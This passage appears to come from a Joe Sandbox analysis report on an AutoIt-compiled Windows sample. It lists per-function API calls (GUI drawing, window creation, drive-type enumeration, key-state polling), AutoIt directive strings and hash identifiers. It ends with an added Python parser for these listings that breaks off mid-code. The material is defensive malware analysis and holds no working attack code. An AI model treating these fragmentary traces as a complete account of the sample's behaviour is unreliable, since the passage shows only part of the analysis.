                                              • Opcode Fuzzy Hash: 69a163962d9a3f61504399de29301002fa954c1470f7930e8cdb53f57c711447
                                              • Instruction Fuzzy Hash: DCD15E702187019BCA04EF10C456A6EB7E1EF55B54F1484EAF8965B3E3EB31DE0ACB52
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 00BDA630
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BDA661
                                              • GetSysColor.USER32(0000000F), ref: 00BDA66D
                                              • SetBkColor.GDI32(?,000000FF), ref: 00BDA687
                                              • SelectObject.GDI32(?,00000000), ref: 00BDA696
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA6C1
                                              • GetSysColor.USER32(00000010), ref: 00BDA6C9
                                              • CreateSolidBrush.GDI32(00000000), ref: 00BDA6D0
                                              • FrameRect.USER32(?,?,00000000), ref: 00BDA6DF
                                              • DeleteObject.GDI32(00000000), ref: 00BDA6E6
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00BDA731
                                              • FillRect.USER32(?,?,00000000), ref: 00BDA763
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BDA78E
                                                • Part of subcall function 00BDA8CA: GetSysColor.USER32(00000012), ref: 00BDA903
                                                • Part of subcall function 00BDA8CA: SetTextColor.GDI32(?,?), ref: 00BDA907
                                                • Part of subcall function 00BDA8CA: GetSysColorBrush.USER32(0000000F), ref: 00BDA91D
                                                • Part of subcall function 00BDA8CA: GetSysColor.USER32(0000000F), ref: 00BDA928
                                                • Part of subcall function 00BDA8CA: GetSysColor.USER32(00000011), ref: 00BDA945
                                                • Part of subcall function 00BDA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BDA953
                                                • Part of subcall function 00BDA8CA: SelectObject.GDI32(?,00000000), ref: 00BDA964
                                                • Part of subcall function 00BDA8CA: SetBkColor.GDI32(?,00000000), ref: 00BDA96D
                                                • Part of subcall function 00BDA8CA: SelectObject.GDI32(?,?), ref: 00BDA97A
                                                • Part of subcall function 00BDA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA999
                                                • Part of subcall function 00BDA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BDA9B0
                                                • Part of subcall function 00BDA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00BDA9C5
                                                • Part of subcall function 00BDA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BDA9ED
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 3521893082-0
                                              • Opcode ID: e9295c39548670e57be9df4eeac80759faa150c4752098aac771e92af795ffd9
                                              • Instruction ID: d2da2d31ec493ff8b467935bbb80c93608f88d355a38ff54984dc53edadb479f
                                              • Opcode Fuzzy Hash: e9295c39548670e57be9df4eeac80759faa150c4752098aac771e92af795ffd9
                                              • Instruction Fuzzy Hash: 77916F72409302EFC7109F64DC48A6BBBE9FB48325F144A2AF962971A0EB71D944CB52
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 00BC74DE
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BC759D
                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BC75DB
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00BC75ED
                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00BC7633
                                              • GetClientRect.USER32(00000000,?), ref: 00BC763F
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BC7683
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BC7692
                                              • GetStockObject.GDI32(00000011), ref: 00BC76A2
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BC76A6
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00BC76B6
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC76BF
                                              • DeleteDC.GDI32(00000000), ref: 00BC76C8
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BC76F4
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BC770B
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BC7746
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BC775A
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BC776B
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BC779B
                                              • GetStockObject.GDI32(00000011), ref: 00BC77A6
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BC77B1
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00BC77BB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              • Opcode ID: 3b0b5645bc2b2cbdf42642936b4edfa10beaf713a417c19f1c0f45e6cc58571e
                                              • Instruction ID: b55ae31a7babccc080d319ea2e52a01bc9d1a43ed451d0f42953288dbbddf48e
                                              • Opcode Fuzzy Hash: 3b0b5645bc2b2cbdf42642936b4edfa10beaf713a417c19f1c0f45e6cc58571e
                                              • Instruction Fuzzy Hash: 44A17EB1A40615FFEB14DBA4DC4AFAEBBB9EB45710F048155FA15A72E0DB70AD00CB60
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00BBAD1E
                                              • GetDriveTypeW.KERNEL32(?,00BDFAC0,?,\\.\,00BDF910), ref: 00BBADFB
                                              • SetErrorMode.KERNEL32(00000000,00BDFAC0,?,\\.\,00BDF910), ref: 00BBAF59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: fc15660b7d4e47194c17c23d5d9b8a90df3e1b6eae02775576673e5172061c01
                                              • Instruction ID: 1a89923056b557a92e7978ce2d3c73ea7de2f39d027447d21a34d554fae210ab
                                              • Opcode Fuzzy Hash: fc15660b7d4e47194c17c23d5d9b8a90df3e1b6eae02775576673e5172061c01
                                              • Instruction Fuzzy Hash: 765142B0A48605DBCB10EB10C9A2DFD73E1EB4871172480E6F847E76D1DEB19D49EB52
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 1038674560-86951937
                                              • Opcode ID: 09587c1d1db511c23000e8aa8ab6af1a4187a1866c7b9b6a037b2fb086871340
                                              • Instruction ID: e4be2d7e57e9fbe91780a8bd294162ec816080e3432789c5375c8a17723cc2a3
                                              • Opcode Fuzzy Hash: 09587c1d1db511c23000e8aa8ab6af1a4187a1866c7b9b6a037b2fb086871340
                                              • Instruction Fuzzy Hash: 918117B0600206AACB25BB60DC82FBE37E8EF15701F4440E5FD15AB1E2EB60DE49D360
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00BD9AD2
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00BD9B8B
                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00BD9BA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: 0
                                              • API String ID: 2326795674-4108050209
                                              • Opcode ID: 381cc0db43800db27a9fc02bb2285f22694c3abc41f398209b112b942d811c58
                                              • Instruction ID: 14d7617e66eba9640eea0fde3a00c1d0160ffab5a8398251899a9f885d0e23cc
                                              • Opcode Fuzzy Hash: 381cc0db43800db27a9fc02bb2285f22694c3abc41f398209b112b942d811c58
                                              • Instruction Fuzzy Hash: FF02DE30109202AFE725CF14C898BAAFBE5FF49314F0485AEF999D63A1E734D944CB52
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 00BDA903
                                              • SetTextColor.GDI32(?,?), ref: 00BDA907
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BDA91D
                                              • GetSysColor.USER32(0000000F), ref: 00BDA928
                                              • CreateSolidBrush.GDI32(?), ref: 00BDA92D
                                              • GetSysColor.USER32(00000011), ref: 00BDA945
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BDA953
                                              • SelectObject.GDI32(?,00000000), ref: 00BDA964
                                              • SetBkColor.GDI32(?,00000000), ref: 00BDA96D
                                              • SelectObject.GDI32(?,?), ref: 00BDA97A
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA999
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BDA9B0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00BDA9C5
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BDA9ED
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BDAA14
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00BDAA32
                                              • DrawFocusRect.USER32(?,?), ref: 00BDAA3D
                                              • GetSysColor.USER32(00000011), ref: 00BDAA4B
                                              • SetTextColor.GDI32(?,00000000), ref: 00BDAA53
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BDAA67
                                              • SelectObject.GDI32(?,00BDA5FA), ref: 00BDAA7E
                                              • DeleteObject.GDI32(?), ref: 00BDAA89
                                              • SelectObject.GDI32(?,?), ref: 00BDAA8F
                                              • DeleteObject.GDI32(?), ref: 00BDAA94
                                              • SetTextColor.GDI32(?,?), ref: 00BDAA9A
                                              • SetBkColor.GDI32(?,?), ref: 00BDAAA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              • Opcode ID: a142292cdba9886bd84c8fbb9331dc3666d96c78c85dff52f377bca1d19b158c
                                              • Instruction ID: 44a976ad8fe89096131798a4da00953c13a2e5f5dee8c21ea8983322aab8dd1f
                                              • Opcode Fuzzy Hash: a142292cdba9886bd84c8fbb9331dc3666d96c78c85dff52f377bca1d19b158c
                                              • Instruction Fuzzy Hash: 9D516271905209FFDF109FA4DC48EAEBBB9EF08320F154166F912AB2A1EB759940CF50
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BD8AC1
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD8AD2
                                              • CharNextW.USER32(0000014E), ref: 00BD8B01
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BD8B42
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BD8B58
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD8B69
                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BD8B86
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00BD8BD8
                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BD8BEE
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD8C1F
                                              • _memset.LIBCMT ref: 00BD8C44
                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BD8C8D
                                              • _memset.LIBCMT ref: 00BD8CEC
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BD8D16
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BD8D6E
                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00BD8E1B
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BD8E3D
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BD8E87
                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BD8EB4
                                              • DrawMenuBar.USER32(?), ref: 00BD8EC3
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00BD8EEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                              • String ID: 0
                                              • API String ID: 1073566785-4108050209
                                              • Opcode ID: 0e9e518fb71f9f2eaaa599a70a0fa9eb547fffad78ddd61a34c748f9766632a1
                                              • Instruction ID: d4e718c8e4e888817265762c4a33794c4ef2f8b9652b7805a936478b4efa176b
                                              • Opcode Fuzzy Hash: 0e9e518fb71f9f2eaaa599a70a0fa9eb547fffad78ddd61a34c748f9766632a1
                                              • Instruction Fuzzy Hash: 0CE16171905209AFDB219F54CC84EEEBBF9EF05711F1481A7F919AB290EB709980DF60
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00BD49CA
                                              • GetDesktopWindow.USER32 ref: 00BD49DF
                                              • GetWindowRect.USER32(00000000), ref: 00BD49E6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BD4A48
                                              • DestroyWindow.USER32(?), ref: 00BD4A74
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BD4A9D
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD4ABB
                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BD4AE1
                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00BD4AF6
                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BD4B09
                                              • IsWindowVisible.USER32(?), ref: 00BD4B29
                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BD4B44
                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BD4B58
                                              • GetWindowRect.USER32(?,?), ref: 00BD4B70
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00BD4B96
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00BD4BB0
                                              • CopyRect.USER32(?,?), ref: 00BD4BC7
                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00BD4C32
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: a88e865ab056742ad42228cbba01b0928f2b202b3c830c4a1c24666e258004d6
                                              • Instruction ID: 7ae8b76c6124896e1e54e35cab04ad176b86c791ea281a2bc6dd30d803911865
                                              • Opcode Fuzzy Hash: a88e865ab056742ad42228cbba01b0928f2b202b3c830c4a1c24666e258004d6
                                              • Instruction Fuzzy Hash: 82B16C71608341AFDB04DF64C884B6AFBE4FF85314F00899EF9999B291EB71D805CB55
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528BC
                                              • GetSystemMetrics.USER32(00000007), ref: 00B528C4
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528EF
                                              • GetSystemMetrics.USER32(00000008), ref: 00B528F7
                                              • GetSystemMetrics.USER32(00000004), ref: 00B5291C
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B52939
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B52949
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B5297C
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B52990
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00B529AE
                                              • GetStockObject.GDI32(00000011), ref: 00B529CA
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B529D5
                                                • Part of subcall function 00B52344: GetCursorPos.USER32(?), ref: 00B52357
                                                • Part of subcall function 00B52344: ScreenToClient.USER32(00C157B0,?), ref: 00B52374
                                                • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000001), ref: 00B52399
                                                • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000002), ref: 00B523A7
                                              • SetTimer.USER32(00000000,00000000,00000028,00B51256), ref: 00B529FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: 8fc30edeb294e4d48438fe82663f2ae9c883d9bdafb2101c0791ab6fccf9b0d7
                                              • Instruction ID: 807b9f7c9a2338729aa9c130df3b4d45543dba7fc3d0a42d4a1f8e909117c6d3
                                              • Opcode Fuzzy Hash: 8fc30edeb294e4d48438fe82663f2ae9c883d9bdafb2101c0791ab6fccf9b0d7
                                              • Instruction Fuzzy Hash: 63B16C71A0120ADFDB14EFA8DC95BED7BF4FB49311F1081A9FA16A72A0DB749841CB50
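The "APIs" bullets in this listing are regular enough to parse (API name, module, argument tokens, the "ref:" call-site address, and the address of the sub-called function on "Part of subcall function" lines), and for a report this long that is how an analyst gets from thousands of raw bullets to the string arguments and API names worth following up. The parser below is an added example written for this page; it is not Joe Sandbox code and not code from the analysed sample. Its sample input is copied verbatim from the "AutoIt v3 GUI" function block above plus three lines from other blocks, and the watchlist of APIs is chosen here for illustration (it mirrors behaviours named in the report's signature section, not any list Joe Sandbox ships).

```python
"""Parser for the per-function API bullets Joe Sandbox emits (the "APIs" sections
above).  Added example for triaging a long listing; not Joe Sandbox code and not
code from the analysed sample."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Group 1: address of the sub-called function on "Part of subcall function" lines,
# 2: API name, 3: module, 4: raw argument list (absent when no parentheses are
# shown, e.g. "_memset.LIBCMT ref: ..."), 5: call-site address after "ref:".
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([A-Za-z_][\w@]*)\.([A-Za-z0-9_]+)"
    r"(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)
_HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")  # a resolved numeric argument or address


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]                   # raw tokens; '?' where the sandbox could not resolve one
    site: int                         # address of the call instruction ("ref:")
    subcall_of: Optional[int] = None  # set when the call sits in a sub-called function

    @property
    def strings(self) -> List[str]:
        """Literal string arguments (window classes, device paths, ...): the
        tokens that are neither '?' nor an 8-digit hex value."""
        return [a for a in self.args if a != "?" and not _HEX8.match(a)]


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every call bullet in `text`; headers and other bullets are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            sub, api, module, rawargs, site = m.groups()
            args = [a.strip() for a in rawargs.split(",")] if rawargs else []
            calls.append(ApiCall(api, module, args, int(site, 16), int(sub, 16) if sub else None))
    return calls


def summarize(calls: List[ApiCall]) -> dict:
    """One function's view: distinct APIs in first-seen order, modules, string
    arguments, and the addresses of the functions it calls into."""
    apis: List[str] = []
    for c in calls:
        if c.api not in apis:
            apis.append(c.api)
    return {"apis": apis,
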